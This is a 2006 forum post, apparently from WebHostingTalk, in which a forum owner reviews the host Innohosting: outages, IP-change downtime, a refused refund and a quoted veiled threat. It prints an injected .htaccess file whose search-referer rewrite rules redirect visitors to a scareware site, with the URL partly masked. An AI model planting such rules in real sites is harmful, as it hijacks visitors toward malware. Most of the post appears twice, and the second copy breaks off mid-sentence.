WilliamP
12-07-2006, 06:22 PM
Innohosting.com Review
Our vBulletin forums that were once hosted at Innohosting.com are www.hometheatershack.com (http://www.hometheatershack.com) and www.bibletruthforums.com (http://www.bibletruthforums.com).
We signed up with Innohosting on about September 23, 2006. This all started as a result of reading some fairly good reviews here at WebHostingTalk.com forums. They appeared to be a pretty good company and I PM'd one of their reps, maybe the owner, I'm not sure which, his name is Rameen (his handle here is stealthdevil).
Keep in mind that I am not a pro at looking for hosting companies, although I've learned a lot from the few we have hosted with. Outside of having a very small personal webpage with GoDaddy for several years, I know nothing about web hosting to speak of. All I knew at the time I was speaking with Rameen was how terrible of a hosting experience we had been through for the 5-6 previous months of hosting our vbulletin forum (a review of one of those companies is posted here as well). I expressed and stressed how important uptime was to us as well as site speed. Of course, as most salesmen would do, he ensured me that we would have 100% uptime and no problems, although they only guarantee 99.9%. I was sold and felt like giving them a shot at our business.
Rameen and I are speaking via instant messaging. He completes all my stuff for me and gives me the link to pay. He did mention the TOS and I think okay... typical stuff that nobody ever reads (who really reads the fine print?).... seems like a nice and honest guy, what would they have to hide or why would they be any different than most other hosts? Actually at the time I really did not know what TOS was and unfortunately I did not pay it much attention. I admit, I shunned it off, regretably... I was simply too trustworthy. However, I never agreed to anything... there was no checkbox to check and/or no form to accept on a website or anything... it was merely an instant messaging type deal. I never told him I agreed to anything nor did I ever sign anything electronically or otherwise. He never advised me that I had to agree to anything before paying... we simply paid via Paypal.
We get it all setup and get our accounts transferred over to Innohosting and things go pretty well for about a week. From there it's downhill. It's like I explained to Chris at Innohosting when he accused me of being abusive to them with my words... it wouldn't have been so bad had Rameen not promised us so much in the beginning. We were expecting a superior hosting experience and what we got was far from it. So... let's look at our experience in detail...
Service began on 9/23/06 and things move along fairly well at 100% uptime for the first week.
10/2/06 I had a complaint from a staff member that the site was not loading... it was down already within the first 10 days. The support section on their site was not accessible so I eased on over here to WebHostingTalk.com forums and started a thread (http://www.webhostingtalk.com/showthread.php?t=551661&highlight=innohosting). If you look at the thread you will see that Rameen replies later that they had not experienced any outages. There is no doubt our site was down... all members were cleared out and I had no problem accessing any other site I went to other than ours hosted with Innohosting. Sometimes hosting companies do not want to admit when they have problems or they do not notice it themselves so they automatically assume it did not happen. I explain this in the thread... and notice post #7: "Same goes with my sites too. For the past 1 week there has been 1 or 2 outages but its less than 2 mins. Today was quite long. Really hope they fix it. Haven't heard of any maintenance notices too. If anyone knows what happened please let us know. Thanks." Apparently we were not the only site to be down.
10/17/06 Notice in the same thread as mentioned above, Rameen admits the server was down for about an hour and I post that it was a challenge to open a support ticket. Okay... I'm not going crazy at least... another customer has similar issues as you can see.
10/27/06 Our site goes down again... I mention it in that same thread and you can see that Rameen gets pretty defensive about it. Obviously he is in denial that they are having problems. I guess their monitoring software is not as dependable as they would like. There was no doubt about it... we were down and so were they. Notice he never responded after I explained it in detail. Obviously he could no longer deny it.
On 11/2/06 We had some previous email issues and learned we did not have a dedicated IP address. I asked for one as well as I asked them would there be any downtime and the reply was they had never experienced any with an IP change. I emphatically stated that we wanted no downtime. I specifically asked them if changing from a shared IP address to a dedicated IP address would be similar to moving servers. They claimed it was nothing like that and that we'd have no problems... so I agreed. For verification of this see this ticket (http://www.innohosting.info/innohosting-email-errors-incompetency.html).
On 11/3/06 I woke up and learned the site had been down for a little over 6 hours. I immediately opened a ticket at Innohosting and was told the following: "Hi William, It seems the IP change has caused some problems for your site. The server is actually up and serving sites. We are working on it and hope to have it fixed in a few minutes."
Of course the ticket continues back and forth and I am told that the datacenter didn't assign the IP to them and thus they had to change our IP back and it had to then resolve back to our previous IP (up to another 24 hours of possible downtime). How can a web host assign IP addresses and not even bother to test it or check and see if it's assigned to them? Why would you tell me that we would have no downtime if you knew the new IP had to resolve. Unfortunately I didn't realize this until afterwards... I understand much more about all this now than I did then. You have to remember, I'm counting on Innohosting to keep us straight. Nearly 24 hours later the site finally gets back up. So much for absolutely no downtime that I was promised.
On 11/4/06, Chris tells me everything is setup for the IP change and AGAIN he assures me that there will be no downtime... the IP will resolve instantly so I will not have to go through that propagation period. I'm like, okay, cool, but I don't want any downtime. At this point I'm assuming he has someway of swapping IP addresses without any downtime. I had heard of IP forwarding or redirect, but wasn't sure exactly how it worked. At any point, a few minutes later the site is down again. I am completely baffled at this point. Naturally I'm angry and upset. Chris tells me to clear my cache, etc, etc.... my response to him... "I have cleared my cache, but still the same, even on my other computer. Anyway, this is obviously something that does in fact cause the site to go down for a resolving period. I'm going to sleep, maybe it will all be worked out in the morning... at least I hope." I think this is a normal reaction to what has happened. After all, I've been misled for two days now about not having any down time. Later on that day I complained in a new ticket that our site was crawling and it was. It was slow as molasses. Much later that day it got better but still it was slower than normal. I was told it was a hung script. For supporting evidence of the site being down and the IP address problems, see this ticket (http://www.innohosting.info/innohosting-site-down-several-hours.html). We also had super high server loads during a long period which I documented... see this ticket (http://www.innohosting.info/innohosting-high-server-load.html).
11/7/06 I open another ticket because our site is still running super sluggish. Some pages taking 30 seconds to load. I had remembered back to when some of our staff members were complaining of how long some pages were taking to load. The first complaint by our staff was back on 10/25/06. See this ticket (http://www.innohosting.info/innohosting-slow-site-speed.html).
11/8/06 Our site goes down and I responded on an already opened ticket. It only goes down for a few minutes and they tell me they are "watching things closely".
11/9/06 I go to the forum and for some weird reason on a few links I click I get redirected to this ameana website with some kind of popup warning about a virus that is telling me I'm infected and it will not go away. I have no idea what's going on, but every time I go to the site I have popups and problems. I spend nearly all day on a another forum trying to figure out what in the world is going on. I'm not sure why, but for some reason I look at our .htaccess file and this is what it looked like:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*www.* (http://www.*) [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule ^(.*)$ ****://****eyes.com/db/go.php?link=1 [R=301,L]
I deleted part of the website URL since I wouldn't want anyone accidentally going there as a result of seeing it here.
So, I'm wondering how in the world does someone break into our ftp account and change our .htaccess file? Surely this cannot be happening. Obviously I notify Innohosting to warn them of what happened and this is the response I get: "We are aware of this and have been working continuously (literally non-stop) for 12 days now resolving the issue. A newsletter updating everyone is going to be sent out shortly." They have known about it for 12 days? Why would they not tell us of this and advise us that our .htaccess files were altered if they knew about it. It sure would have saved me a lot of headaches. For evidence see this ticket (http://www.innohosting.info/innohosting-htaccess-security-breech.html).
11/11/06 Our site is down and had been down for several hours... the page was loading an error that I was not familiar with. I respond to an already open ticket at Innohosting and asked have they done anything to cause our site to go down? A little while later was informed that if I was having a problem that I needed to be more specific. I notice the terminology "Ioncube" in the error so I figured I visit vBSEO forums since I knew their program had something to do with Inocube. I was told by them that it appears our server no longer had Ioncube installed. I learned this is what is called IonCube Loader software and it's needed for most forums... especially if you run vBSEO. So I get more specific and tell Chris that something was up with Ioncube.
Don't forget... because of what Innohosting did our site was down for several hours. I actually ended up having to close the forum during the time I was trying to figure out what was going on. This is the response I get from Chris:
"You can turn your forum back online. We issued an emergency php recompile. The loaders were down for 3-5 min MAX. I would like to mention to you that I always get a sense of abuse with your comments. I do not feel that it is nessacary. With no disrespect, It seems that we can not please you in any way. Please understand that have been working up to 20 hr shifts to resolve this server issue on voyager. What has happened is something that is not uncommon in a shared environment. We very well could have taken the normal practice and moved you to a new server. However, you will be looking at 2 days downtime atleast. Instead, we fought our tails off to find any clues and act upon them. We went as far as even installing process loggers to review them when we have time. We are having a shaky time with voyager yes. I have a feeling of confidence that you will notice better performance after today as we shut down and removed several files that could have been the problem to cause the exploits. Let's calm down for a little bit.. We are always up to suggestions on improvements."
Now... I don't know about you, but I've been through a major nightmare for the last 10 days and I'm supposed to somehow be calm. I'm obviously abusing him or them with my comments. Oh... I've had nothing but problems for a solid 10 days and I'm just supposed to be giggling and laughing? So... I kindly reply as follows since it seems Chris needs to be enlightened on what we were promised during the sale:
Sorry you feel like I've abused you. I mean no offense... I call it like I see it. There is no reason for me to calm down since every time I post it's with a smile and many times with a chuckle. It's all somewhat funny to an extent, yet very serious.
You guys really must not do much in the real world out here though and you definitely have no concept of time. First off, what is happening is extremely uncommon... so uncommon I've not been able to find anyone else that has ever heard of such a security breech and I've been around since Internet started. Maybe it isn't uncommon with you guys... I don't know. Secondly... we were down for 15-20 minutes, not 3-5. We were actually down much longer than that (several hours) because I had no idea what had happened and after re-uploading the Ioncube loaders to the server, which on this slow connection of mine took 5 minutes, I was still getting the error. My first reaction was to unload the software that was using the loaders and that created about an hour of work to reinstall... all while our forum was closed.
As far as pleasing me... well, (now I'm smiling really big... grinning from ear to ear)... when I was searching for a host I expressed my concerns with our former two hosts and how we were experiencing downtime snippets, various issues here and there, sluggish speeds, etc. I advised then that we needed an extremely reliable host without all these problems (similar to what we are experiencing now... and I'm still smiling). I was told that you guys were the bomb (by Rammeen)... 100% uptime forever and I'd be on your best server, etc, etc. I even offered to pay more if needed to ensure I would be taken well care of and not have the issues we are having now.
Now put yourself in my shoes. I could almost guarantee anyone else would most likely have been gone like a freight train.
Hey, I'm learning though. See, you guys had not had any experience with a vBulletin forum and I think this all somewhat took you by surprise. All of the sudden one client is using 30, 40, even sometimes over 50% of the CPU on this server (this according to Rameen). Not hardly fair granted. MySQL queries are very processor intensive and it's apparent that a shared hosting account is going to be a tough ride, especially since we are growing very fast and it will only get more intense. It's also apparent that it is very difficult to find shared hosting for forums that does not have little nitty downtime issues quiet frequently.
You see... being on a forum we are online constantly... someone on our staff is there... we notice every instance of downtime, even if it is for only 30 seconds. Even a few seconds of downtime will clear out our members and visitors and very likely cause them either sign off, go to another site or even another forum. It hurts us... and until you run a forum that is making you money it will difficult for you to understand how important it is to keep those members and visitors connected. If you got just a regular ole website that doesn't do much, hardly anyone is gonna notice that few minutes of downtime. A forum is completely different and this is what I don't think most hosting companies that have never hosted forums or have never hosted a very busy forum will understand.
Bottom line Chris... I sincerely was not expecting to have any issues at all with you guys, not according to how I was sold. So, you should be able to figure out why it might seem like I'm abusing you with my words. It's frustrating, but I promise I'm smiling and I'm not being sarcastic. My wife is amazed at how I can discipline our daughter and never break a smile... how I can get upset with someone and be smiling the entire time. However, I'm will always call it like it is.... when it's black it's black and when it's white it's white... always will be that way.
With kindest respect,
Then Chris finally admits:
In all honesty, this exploit was issued over 12 times in the past few weeks. The changes were quickly reversed by hand by our staff. The only way to eliminate the source was to let it happen and see how it happened in our process logs. This is why your .htaccess files went unchanged. We could have quickly corrected the file and gone unnoticed, but we would have to do the same only a few hours later on an ongoing schedule. The hardest things we had to bite on was to keep this information from our clients (you). All of this is documented in this ticket (http://www.innohosting.info/innohosting-htaccess-security-breech.html).
Obviously I was a suspect. Otherwise they would have corrected our .htaccess quickly... read it... that is what he wrote. He had to keep it from us, the client. Now keep this in mind a little later on. I guess I remain a suspect for a while... even though it is causing me all kinds of headaches.
11/16/06 Our site goes down again for about 10-15 minutes. I opened a ticket and reported it since it was beginning to be a common thing I figured we needed records. See this ticket (http://www.innohosting.info/innohosting-site-down.html).
11/19/06 Another security breech... actually this was the fourth one total. Yep... four (4) times our .htaccess file was replaced with malicious content. This is pretty serious stuff and I am told they can't figure out who is doing it and have no fix for it. Of course they have offered to move us, but what difference would it make? They can't protect us now, how they gonna protect us later? See this ticket (http://www.innohosting.info/innohosting-security-breech.html).
Now remember earlier I stated we had started noticing sluggish speeds back around 10/25/06. We had a few features that were giving us problems... I started documenting these problems in a thread in our forum and kept a log on all the problems we were experiencing. After trying several different things I finally decided it was time to open a ticket with vBulletin support in an attempt to figure out what was going on. Pages were not loading and we were having some serious issues. I was thinking it was a vBulletin issue since it was only happening on a few features. Anyway, I spend a couple of days with vBulletin going through everything possible. I uninstalled over a dozen modifications that took me days to get installed just so we could eliminate any possible culprits. We had to close the forum on numerous occasions to troubleshoot the problems. When it was all said and done... guess where the problem was... yep... it was Innohosting hardening the php and using mod_security. See below.
11/24/06 I open yet another ticket and asked about "hardened php patch" and "mod_security" being installed on the server. Of course they admit it but refuse to believe that it effects vBulletin and refuse to do anything about it. The bottom line is that they installed this about a month before and that's when our problems started. This entire time we are having issues and our site is running sluggish as a result of their security breeches. See this ticket (http://www.innohosting.info/innohosting-vbulletin-errors.html) for full details.
Can you imagine having the problems we were having and continuing to use their hosting service, even if they did agree to upgrade us to a VPS for a minimal increase in cost? One problem after another after another. It was never ending. Surely no one in their right mind would continue. No, absolutely not!
I began back on 11/13/06 looking for us a dedicated server because I had given up on shared hosting after having all these problems. But this experience was by far the worst. I thought RealWebHost and Hostww was pretty bad, but this one was by far much worse. The funny thing about these shared hosting companies is they all had constant excuses and seem to always blame it on someone else and they got terribly upset if the customer complained. I suppose we are simply supposed to keep our mouth shut and never say a word about the poor service we get? Who are we supposed to contact if it's not who sold us?
Now I'll have to hand it to Rameen for one thing he did for us. I suppose he was really feeling pretty bad about the lousy service we had experienced. On 11/25/06 our dedicated server was ready and we needed help moving our main account, Home Theater Shack. Rameen actually moved it to the new server for us. Of course I thanked him and told him I'd give them good props for helping us out. It was very generous of him to do this. There are your good props Rameen. What this boils down to is that initially I was not even going to bring all this up. I was just gonna let it go. I had just about made up my mind to leave our other forum we had with them where it was, since it was just getting started and there is very littel traffic to it. However... on 12/1/06 that site went down and was having database errors. Plus I got to thinking, it's gonna continue to have those feature errors and run sluggish as well because of the php hardening and mod_security. Not to mention we had yet another security breech. Obviously the software they installed on the server was not helping stop the security breeches but it was sure making our site sluggish. I decided it was best to go ahead and move it as well and did so.
Now, let me ask you (the reader) a question. If you were a legitimate, honest, above board company that intended on staying in business for a long time... if you were running a business with the utmost integrity and respect for your clients, would you make a client that had been through what we have been through pay a dime? You know if you go to a restaurant and get a really bad meal, you know, one of those kind that make you wanna throw up, they don't usually make you pay for it. At least they don't if they are a well respected and quality restaurant, right? Of course not!
Think about all that we've been through... it's a miracle we are even alive. Even after all that I was not even expecting to get a full refund, although I can say without hesitation that I would have never made anyone pay for such horrendous service. That I can guarantee you. What I thought they would at least have the decency to do would be refund us for the period of time that we would not be using their service. The monthly fee was $40, which was $480 a year. I had agreed with Rameen to pay annually for a discount. He knocked off $50 and I paid the $430, plus some more later on for the dedicated IP address. Anyway, we'll just work off the $430. Any respectable company (I would think) would at least say, okay you have had some real hassles with our service so we are gonna charge you the monthly rate of $40 for two months with no discount since you wouldn't be paying for a full year if you paid by the month. We'll refund you the $350 difference. So they would end up charging us $80 + the IP address charge for really poor performance. Fair enough.
Obviously they don't agree, because their policy states no refunds after 16 days. They advised me quickly that I would not be getting a refund. It really didn't matter to them that the service we received was the epitome of poor service. I started out being nice about it and asking politely, but nope... they immediately started finding fault with me... turning the tables to try and make the customer look like they are at fault. I'm not sure how much more unprofessional it can get. First of all, most reputable companies wouldn't have such a policy as to not refund for service not provided. Most would stand behind their services. Second, regardless of policy, if I had put a customer through what we have been through, I would have the moral decency to give them a complete refund. To top it all off, they finally accused me of blackmailing and threatening them as well as abusing their service. I don't see how telling the truth is blackmail... telling the truth is not a threat... it's fact! As far as abusing their services... get real, they abused us. It's pretty hard to abuse services when the service being provided is extremely poor to begin with. How do you abuse service you don't have. Again, this is simply a deceptive tactic they use to get around any moral and ethical decisions they might have to make. See this ticket (http://www.innohosting.info/innohosting-account-canceled.html).
Now let's talk about threats... below is what Rameen wrote towards the end of the ticket where I tried to get our account reinstated... this ticket (http://www.innohosting.info/innohosting-deny-account-access.html).
Rameen has accused me of editing the ticket and adding his threat. I went to the client support area of Innohosting and took a screen shot of that entire page. As you can see from the screen shot, it would be impossible for me to edit their page. Screen shot of threat. (http://www.innohosting.info/images/screenshotofthreat.gif)
Here is Rameen's threat...
That precious forum of yours is very valuable and I bet the more visitors you get, the more money you make from the ads...It would be a tremendous shame if something happened to it.
At least we will know who to pursue should our forum get hacked.
A few other facts concerning their uptime comments... with proof... in this thread (http://www.webhostingtalk.com/showpost.php?p=4247488&postcount=9) here at WebHostingTalk.com, he makes this post...
I have one server at HiVelocity... They are pretty good, and the support I get has been exceptional... I've had 100% uptime since I have been with them. I would recommend them.
Then in this thread (http://www.webhostingtalk.com/showpost.php?p=4162391&postcount=9) which was some time before the claim of 100%... he makes this post...
We are currently installing new software and extra security on one of our servers. The server required a restart, however the data center (HiVelocity) had been mislabeled this server and took them almost an hour to find it and reboot it. Otherwise downtime would of only been a couple of minutes. We did express our concern in this issue and it was more or less out of our hands... We have had no recent reports of downtime other than when we experienced the above problem. If at anytime you experience an outage we recommend you open a ticket and include a tracert so we can troubleshoot it.
Furthermore... notice that just a few posts below his post in that same thread that another customer complains about downtime on that same server...
And yes i'm also facing a lot of downtimes lately. I did inform this the same to Chris. He also mentioned the same problem as you did. But after that also, at times the server or may be network is going down.
So how exactly is it possible that they could have 100% uptime? By Rameen's own admission, it is not possible. Draw your own conclusions.
Hopefully, if you are with Innohosting now, your experience will not end up being the same, which is one of the purposes of this thread. Otherwise, they have some work to do if they want to be a viable candidate for hosting.
Now, Rameen will claim that I'm ignorant, which I may be, you read the above and tell me. If I am, so be it, but that still doesn't mean we should be treated the way we have. He will claim that I'm angry and will do and say whatever.... of course I'm angry... I have a right to be angry. However, I can do and say whatever I want... I am limited for obvious reason. He may claim that I've edited tickets, which is false... I have no reason to do such. The one ticket he claims I have edited is no longer even on their system... they deleted it shortly after I took a screen print of it to prove I did not edit it.
Consider the bottom line... do you wanna go through what we went through?
I will give Rameen and Chris the last word here and I'll say no more... they can have at it. I don't think I need to say any more. I'm sure most everyone can figure it out... facts are facts and had we had good service and performance without all the security breeches, we'd still be with them.
Our vBulletin forums that were once hosted at Innohosting.com are www.hometheatershack.com (http://www.hometheatershack.com) and www.bibletruthforums.com (http://www.bibletruthforums.com).
We signed up with Innohosting on about September 23, 2006. This all started as a result of reading some fairly good reviews here at WebHostingTalk.com forums. They appeared to be a pretty good company and I PM'd one of their reps, maybe the owner, I'm not sure which, his name is Rameen (his handle here is stealthdevil).
Keep in mind that I am not a pro at looking for hosting companies, although I've learned a lot from the few we have hosted with. Outside of having a very small personal webpage with GoDaddy for several years, I know nothing about web hosting to speak of. All I knew at the time I was speaking with Rameen was how terrible of a hosting experience we had been through for the 5-6 previous months of hosting our vbulletin forum (a review of one of those companies is posted here as well). I expressed and stressed how important uptime was to us as well as site speed. Of course, as most salesmen would do, he ensured me that we would have 100% uptime and no problems, although they only guarantee 99.9%. I was sold and felt like giving them a shot at our business.
Rameen and I are speaking via instant messaging. He completes all my stuff for me and gives me the link to pay. He did mention the TOS and I think okay... typical stuff that nobody ever reads (who really reads the fine print?).... seems like a nice and honest guy, what would they have to hide or why would they be any different than most other hosts? Actually at the time I really did not know what TOS was and unfortunately I did not pay it much attention. I admit, I shunned it off, regretably... I was simply too trustworthy. However, I never agreed to anything... there was no checkbox to check and/or no form to accept on a website or anything... it was merely an instant messaging type deal. I never told him I agreed to anything nor did I ever sign anything electronically or otherwise. He never advised me that I had to agree to anything before paying... we simply paid via Paypal.
We get it all setup and get our accounts transferred over to Innohosting and things go pretty well for about a week. From there it's downhill. It's like I explained to Chris at Innohosting when he accused me of being abusive to them with my words... it wouldn't have been so bad had Rameen not promised us so much in the beginning. We were expecting a superior hosting experience and what we got was far from it. So... let's look at our experience in detail...
Service began on 9/23/06 and things move along fairly well at 100% uptime for the first week.
10/2/06 I had a complaint from a staff member that the site was not loading... it was down already within the first 10 days. The support section on their site was not accessible so I eased on over here to WebHostingTalk.com forums and started a thread (http://www.webhostingtalk.com/showthread.php?t=551661&highlight=innohosting). If you look at the thread you will see that Rameen replies later that they had not experienced any outages. There is no doubt our site was down... all members were cleared out and I had no problem accessing any other site I went to other than ours hosted with Innohosting. Sometimes hosting companies do not want to admit when they have problems or they do not notice it themselves so they automatically assume it did not happen. I explain this in the thread... and notice post #7: "Same goes with my sites too. For the past 1 week there has been 1 or 2 outages but its less than 2 mins. Today was quite long. Really hope they fix it. Haven't heard of any maintenance notices too. If anyone knows what happened please let us know. Thanks." Apparently we were not the only site to be down.
10/17/06 Notice in the same thread as mentioned above, Rameen admits the server was down for about an hour and I post that it was a challenge to open a support ticket. Okay... I'm not going crazy at least... another customer has similar issues as you can see.
10/27/06 Our site goes down again... I mention it in that same thread and you can see that Rameen gets pretty defensive about it. Obviously he is in denial that they are having problems. I guess their monitoring software is not as dependable as they would like. There was no doubt about it... we were down and so were they. Notice he never responded after I explained it in detail. Obviously he could no longer deny it.
On 11/2/06 We had some previous email issues and learned we did not have a dedicated IP address. I asked for one as well as I asked them would there be any downtime and the reply was they had never experienced any with an IP change. I emphatically stated that we wanted no downtime. I specifically asked them if changing from a shared IP address to a dedicated IP address would be similar to moving servers. They claimed it was nothing like that and that we'd have no problems... so I agreed. For verification of this see this ticket (http://www.innohosting.info/innohosting-email-errors-incompetency.html).
On 11/3/06 I woke up and learned the site had been down for a little over 6 hours. I immediately opened a ticket at Innohosting and was told the following: "Hi William, It seems the IP change has caused some problems for your site. The server is actually up and serving sites. We are working on it and hope to have it fixed in a few minutes."
Of course the ticket continues back and forth and I am told that the datacenter didn't assign the IP to them and thus they had to change our IP back and it had to then resolve back to our previous IP (up to another 24 hours of possible downtime). How can a web host assign IP addresses and not even bother to test it or check and see if it's assigned to them? Why would you tell me that we would have no downtime if you knew the new IP had to resolve. Unfortunately I didn't realize this until afterwards... I understand much more about all this now than I did then. You have to remember, I'm counting on Innohosting to keep us straight. Nearly 24 hours later the site finally gets back up. So much for absolutely no downtime that I was promised.
On 11/4/06, Chris tells me everything is setup for the IP change and AGAIN he assures me that there will be no downtime... the IP will resolve instantly so I will not have to go through that propagation period. I'm like, okay, cool, but I don't want any downtime. At this point I'm assuming he has someway of swapping IP addresses without any downtime. I had heard of IP forwarding or redirect, but wasn't sure exactly how it worked. At any point, a few minutes later the site is down again. I am completely baffled at this point. Naturally I'm angry and upset. Chris tells me to clear my cache, etc, etc.... my response to him... "I have cleared my cache, but still the same, even on my other computer. Anyway, this is obviously something that does in fact cause the site to go down for a resolving period. I'm going to sleep, maybe it will all be worked out in the morning... at least I hope." I think this is a normal reaction to what has happened. After all, I've been misled for two days now about not having any down time. Later on that day I complained in a new ticket that our site was crawling and it was. It was slow as molasses. Much later that day it got better but still it was slower than normal. I was told it was a hung script. For supporting evidence of the site being down and the IP address problems, see this ticket (http://www.innohosting.info/innohosting-site-down-several-hours.html). We also had super high server loads during a long period which I documented... see this ticket (http://www.innohosting.info/innohosting-high-server-load.html).
11/7/06 I open another ticket because our site is still running super sluggish. Some pages taking 30 seconds to load. I had remembered back to when some of our staff members were complaining of how long some pages were taking to load. The first complaint by our staff was back on 10/25/06. See this ticket (http://www.innohosting.info/innohosting-slow-site-speed.html).
11/8/06 Our site goes down and I responded on an already opened ticket. It only goes down for a few minutes and they tell me they are "watching things closely".
11/9/06 I go to the forum and for some weird reason on a few links I click I get redirected to this ameana website with some kind of popup warning about a virus that is telling me I'm infected and it will not go away. I have no idea what's going on, but every time I go to the site I have popups and problems. I spend nearly all day on a another forum trying to figure out what in the world is going on. I'm not sure why, but for some reason I look at our .htaccess file and this is what it looked like:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*www.* (http://www.*) [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule ^(.*)$ ****://****eyes.com/db/go.php?link=1 [R=301,L]
I deleted part of the website URL since I wouldn't want anyone accidentally going there as a result of seeing it here.
So, I'm wondering how in the world does someone break into our ftp account and change our .htaccess file? Surely this cannot be happening. Obviously I notify Innohosting to warn them of what happened and this is the response I get: "We are aware of this and have been working continuously (literally non-stop) for 12 days now resolving the issue. A newsletter updating everyone is going to be sent out shortly." They have known about it for 12 days? Why would they not tell us of this and advise us that our .htaccess files were altered if they knew about it. It sure would have saved me a lot of headaches. For evidence see this ticket (http://www.innohosting.info/innohosting-htaccess-security-breech.html).
11/11/06 Our site is down and had been down for several hours... the page was loading an error that I was not familiar with. I respond to an already open ticket at Innohosting and asked have they done anything to cause our site to go down? A little while later was informed that if I was having a problem that I needed to be more specific. I notice the terminology "Ioncube" in the error so I figured I visit vBSEO forums since I knew their program had something to do with Inocube. I was told by them that it appears our server no longer had Ioncube installed. I learned this is what is called IonCube Loader software and it's needed for most forums... especially if you run vBSEO. So I get more specific and tell Chris that something was up with Ioncube.
Don't forget... because of what Innohosting did our site was down for several hours. I actually ended up having to close the forum during the time I was trying to figure out what was going on. This is the response I get from Chris:
"You can turn your forum back online. We issued an emergency php recompile. The loaders were down for 3-5 min MAX. I would like to mention to you that I always get a sense of abuse with your comments. I do not feel that it is nessacary. With no disrespect, It seems that we can not please you in any way. Please understand that have been working up to 20 hr shifts to resolve this server issue on voyager. What has happened is something that is not uncommon in a shared environment. We very well could have taken the normal practice and moved you to a new server. However, you will be looking at 2 days downtime atleast. Instead, we fought our tails off to find any clues and act upon them. We went as far as even installing process loggers to review them when we have time. We are having a shaky time with voyager yes. I have a feeling of confidence that you will notice better performance after today as we shut down and removed several files that could have been the problem to cause the exploits. Let's calm down for a little bit.. We are always up to suggestions on improvements."
Now... I don't know about you, but I've been through a major nightmare for the last 10 days and I'm supposed to somehow be calm. I'm obviously abusing him or them with my comments. Oh... I've had nothing but problems for a solid 10 days and I'm just supposed to be giggling and laughing? So... I kindly reply as follows since it seems Chris needs to be enlightened on what we were promised during the sale:
Sorry you feel like I've abused you. I mean no offense... I call it like I see it. There is no reason for me to calm down since every time I post it's with a smile and many times with a chuckle. It's all somewhat funny to an extent, yet very serious.
You guys really must not do much in the real world out here though and you definitely have no concept of time. First off, what is happening is extremely uncommon... so uncommon I've not been able to find anyone else that has ever heard of such a security breech and I've been around since Internet started. Maybe it isn't uncommon with you guys... I don't know. Secondly... we were down for 15-20 minutes, not 3-5. We were actually down much longer than that (several hours) because I had no idea what had happened and after re-uploading the Ioncube loaders to the server, which on this slow connection of mine took 5 minutes, I was still getting the error. My first reaction was to unload the software that was using the loaders and that created about an hour of work to reinstall... all while our forum was closed.
As far as pleasing me... well, (now I'm smiling really big... grinning from ear to ear)... when I was searching for a host I expressed my concerns with our former two hosts and how we were experiencing downtime snippets, various issues here and there, sluggish speeds, etc. I advised then that we needed an extremely reliable host without all these problems (similar to what we are experiencing now... and I'm still smiling). I was told that you guys were the bomb (by Rammeen)... 100% uptime forever and I'd be on your best server, etc, etc. I even offered to pay more if needed to ensure I would be taken well care of and not have the issues we are having now.
Now put yourself in my shoes. I could almost guarantee anyone else would most likely have been gone like a freight train.
Hey, I'm learning though. See, you guys had not had any experience with a vBulletin forum and I think this all somewhat took you by surprise. All of the sudden one client is using 30, 40, even sometimes over 50% of the CPU on this server (this according to Rameen). Not hardly fair granted. MySQL queries are very processor intensive and it's apparent that a shared hosting account is going to be a tough ride, especially since we are growing very fast and it will only get more intense. It's also apparent that it is very difficult to find shared hosting for forums that does not have little nitty downtime issues quiet frequently.
You see... being on a forum we are online constantly... someone on our staff is there... we notice every instance of downtime, even if it is for only 30 seconds. Even a few seconds of downtime will clear out our members and visitors and very likely cause them either sign off, go to another site or even another forum. It hurts us... and until you run a forum that is making you money it will difficult for you to understand how important it is to keep those members and visitors connected. If you got just a regular ole website that doesn't do much, hardly anyone is gonna notice that few minutes of downtime. A forum is completely different and this is what I don't think most hosting companies that have never hosted forums or have never hosted a very busy forum will understand.
Bottom line Chris... I sincerely was not expecting to have any issues at all with you guys, not according to how I was sold. So, you should be able to figure out why it might seem like I'm abusing you with my words. It's frustrating, but I promise I'm smiling and I'm not being sarcastic. My wife is amazed at how I can discipline our daughter and never break a smile... how I can get upset with someone and be smiling the entire time. However, I'm will always call it like it is.... when it's black it's black and when it's white it's white... always will be that way.
With kindest respect,
Then Chris finally admits:
